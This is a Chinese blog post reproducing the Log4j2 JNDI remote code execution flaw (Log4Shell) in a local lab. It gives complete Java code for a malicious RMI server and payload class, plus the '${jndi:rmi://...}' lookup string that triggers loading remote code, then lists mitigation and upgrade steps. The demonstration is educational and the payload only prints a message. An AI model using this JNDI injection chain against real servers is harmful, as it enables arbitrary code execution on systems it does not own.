log4j2远程代码执行漏洞复现

目录

描述:

代码复现:

执行结果:

漏洞解决方案:


描述:

       本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。

代码复现:

JDK: jdk1.8.0_191

开发工具:ideaIU-2018.3.6.win

远程代码下载服务器:nginx-1.20.0

项目结构

log4j2远程代码执行漏洞复现_第1张图片

 rmi-server:

log4j2远程代码执行漏洞复现_第2张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    


package com.lb.rmi.server;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer
{
   public static void main( String[] args ) throws Exception
    {
      String url = "http://127.0.0.1/";
      Registry createRegistry = LocateRegistry.createRegistry(10086);
      Reference r = new Reference("EviObj","com.lb.rmi.common.EviObj",url);
      System.out.println("start rmi server");
      com.sun.jndi.rmi.registry.ReferenceWrapper rw = new com.sun.jndi.rmi.registry.ReferenceWrapper(r);
      createRegistry.bind("evil", rw);
    }
}

rmi-common:

log4j2远程代码执行漏洞复现_第3张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-common

    rmi-common
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
    


package com.lb.rmi.common;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class EviObj implements ObjectFactory {

	static {
		System.out.println("侵入代码执行");
	}

	@Override
	public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
		return null;
	}
}

rmi-client:

log4j2远程代码执行漏洞复现_第4张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    


package com.lb.rmi.client;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class RmiClient
{
	private static final Logger log = LogManager.getLogger();
	
    public static void main( String[] args ) throws Exception
    {
		//-Dcom.sun.jndi.rmi.object.trustURLCodebase=true -Dcom.sun.jndi.ldap.object.trustURLCodebase=true
		System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
		System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
    	String info = "${jndi:rmi://localhost:10086/evil}";
       log.info(">>,{}",info);

    }
}
  
      
          
              
          
      
      
          
              
          
      
  

 远程代码下载服务器:把rmi-common侵入代码编译后拷贝到nginx资源目录下

log4j2远程代码执行漏洞复现_第5张图片

能访问下载即可

 

执行结果:

log4j2远程代码执行漏洞复现_第6张图片

漏洞解决方案:

1、临时缓解方案

  • 在jvm参数中添加 -Dlog4j2.FORMATMsgNoLookups=true
  • 系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true
  • 创建 "log4j2.component.properties" 文件,文件中增加配置 "log4j2.formatMsgNoLookups=true"

2、彻底修复方案

  • 手动删除log4j-core-*.jar中org/apache/logging/log4j/core/lookup/JndiLookup.class,重启服务即可。
  • 升级到官方提供的 log4j-2.15.0-rc2 版本

你可能感兴趣的:(安全)